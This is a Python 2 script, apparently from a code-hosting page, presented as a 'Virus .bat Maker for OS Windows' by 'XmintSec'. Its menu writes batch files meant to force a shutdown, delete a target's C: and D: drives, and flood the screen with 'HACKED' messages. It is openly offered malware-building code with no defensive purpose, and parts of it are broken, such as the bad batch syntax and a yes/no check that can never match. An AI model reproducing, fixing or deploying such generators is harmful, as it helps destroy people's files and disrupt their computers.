123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102 |
- #!/usr/bin/python
- ############################### TOOLS MAKED BY XmintSec
- import os
- import urllib2
- import json
- import time
- import smtplib
- from termcolor import colored, cprint
- from base64 import *
- ############################### RECODE AUTO JAHANNAM
- os.system("reset")
- print ("\033[93m __ __ _ _ ____")
- print ("\033[93m \ \/ /_ __ ___ (_)_ __ | |_/ ___| ___ ___")
- print ("\033[93m \ /| '_ ` _ \| | '_ \| __\___ \ / _ \/ __|")
- print ("\033[93m / \| | | | | | | | | | |_ ___) | __/ (__")
- print ("\033[93m /_/\_\_| |_| |_|_|_| |_|\__|____/ \___|\___|")
- print ("\033[93m -----------------------------------------")
- print ("\033[34m [+]TOOLS : Virus .bat Maker for OS Windows")
- print ("\033[34m [+]Author : XmintSec")
- print ("\033[95m [+]Team : Security Darknet - Anon Cyber Team - Syntax Error Crew")
- print ("\033[34m [+]Gmail : xmintsec@gmail.com")
- print ("\033[34m Found bug? contact my gmail")
- print ("\033[93m -----------------------------------------")
- def menu():
- print'\33[33m Choose The Selection :'
- print'\33[33m -----------------'
- print'\33[33m [1] Shutdown'
- print'\33[33m [2] Delete all Files Target'
- print'\33[33m [3] Summon Text Permanently'
- print'\33[33m [4] Exit'
- print'\33[33m -----------------'
- def shutdown():
- thangans = open ("shutdown.bat","w")
- virus = """
- @echo shutdown -s -t 1 -f
- """
- thangans.write(virus)
- thangans.close
- print 'Want Create our Virus? (y/n)'
- back=raw_input().upper()
- if back=='y':
- menu()
- else:
- exit()
- def delete():
- thangans = open ("delete.bat","w")
- virus = """
- @echo off
- DEL C: -Y
- DEL D: -Y
- """
- thangans.write(virus)
- thangans.close
- print 'Want Create our Virus? (y/n)'
- back=raw_input().upper()
- if back=='y':
- menu()
- else:
- exit()
- def summon():
- thangans = open ("summon.bat","w")
- virus = """
- @echo off
- :Begin
- msg * Your Device got HACKED
- msg * Your Device was infected by THAN MALWARE
- msg * Re - Install your Device
- go to begin
- """
- thangans.write(virus)
- thangans.close
- print 'Want Create our Virus? (y/n)'
- back=raw_input().upper()
- if back=='y':
- menu()
- else:
- exit()
- menu()
- while 1:
- pilih=input('Input Your Selection : ')
- if pilih==1:
- shutdown()
- elif pilih==2:
- delete()
- elif pilih==3:
- summon()
- elif pilih==4 :
- exit()
- else:
- print'maaf pilihan anda tidak ada dimenu'
- print'sorry, your selection not available on menu'
- print'Want Create our Virus? (y/n)'
- back=raw_input().upper()
- if back=='y':
- menu()
- else:
- exit()
|